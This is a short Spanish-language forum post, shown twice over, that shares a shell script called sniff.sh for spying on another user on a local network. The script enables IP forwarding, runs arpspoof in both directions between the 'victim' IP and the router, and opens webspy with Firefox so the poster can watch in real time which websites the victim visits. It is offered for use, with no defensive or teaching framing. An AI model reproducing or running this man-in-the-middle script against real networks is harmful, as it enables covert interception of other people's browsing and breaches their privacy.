Me hice este pequeño script que a mi me va fenómeno.
Capturas el tráfico, arranca el firefox y te muestra en tiempo real las webs que está visitando la víctima.
Descarga
Código:
#!/bin/sh
# sniff.sh
# 22/11/2007 Created by CocoSwit
#
# sniff.sh is a sniffing web script for local-red
# Copy, use it, modify, do what you want with, but under ALWAYS YOUR responsibility.
# sniff.sh es un script para sniffing web en una red local
# Copialo, usalo, modificalo, haz con el lo que quieras, pero SIEMPRE bajo TU responsabilidad.
# La tarjeta de red es $3 , la Ip victima es $1 y la ip del router es $2
if [ $# -ne 3 ]
then
echo
echo ERROR: faltan parametros
echo
echo Usa: $0 ip-victima ip-router tarjeta-red
echo Ejemplo: $0 192.168.1.101 192.168.1.1 eth1
exit
else
# Activamos el ip_forward para poder reenviar el trafico a la victima
echo 1 > /proc/sys/net/ipv4/ip_forward
echo La tarjeta de red es $3 , la Ip victima es $1 y la ip del router es $2
# Ejecutamos en un terminal arpspoof entre la ip victima y la ip de la puerta de enlaze, mas otro arpspoof entre la puerta de enlace y la victima, arrancamos el firefox y capturamos el trafico.
xterm -bg black -fg green -e arpspoof -i $3 -t $1 $2 & xterm -bg black -fg green -e arpspoof -i $3 -t $2 $1 & firefox & xterm -bg black -fg blue -e webspy -i $3 $1
fi
Capturas el tráfico, arranca el firefox y te muestra en tiempo real las webs que está visitando la víctima.
Descarga
Código:
#!/bin/sh
# sniff.sh
# 22/11/2007 Created by CocoSwit
#
# sniff.sh is a sniffing web script for local-red
# Copy, use it, modify, do what you want with, but under ALWAYS YOUR responsibility.
# sniff.sh es un script para sniffing web en una red local
# Copialo, usalo, modificalo, haz con el lo que quieras, pero SIEMPRE bajo TU responsabilidad.
# La tarjeta de red es $3 , la Ip victima es $1 y la ip del router es $2
if [ $# -ne 3 ]
then
echo
echo ERROR: faltan parametros
echo
echo Usa: $0 ip-victima ip-router tarjeta-red
echo Ejemplo: $0 192.168.1.101 192.168.1.1 eth1
exit
else
# Activamos el ip_forward para poder reenviar el trafico a la victima
echo 1 > /proc/sys/net/ipv4/ip_forward
echo La tarjeta de red es $3 , la Ip victima es $1 y la ip del router es $2
# Ejecutamos en un terminal arpspoof entre la ip victima y la ip de la puerta de enlaze, mas otro arpspoof entre la puerta de enlace y la victima, arrancamos el firefox y capturamos el trafico.
xterm -bg black -fg green -e arpspoof -i $3 -t $1 $2 & xterm -bg black -fg green -e arpspoof -i $3 -t $2 $1 & firefox & xterm -bg black -fg blue -e webspy -i $3 $1
fi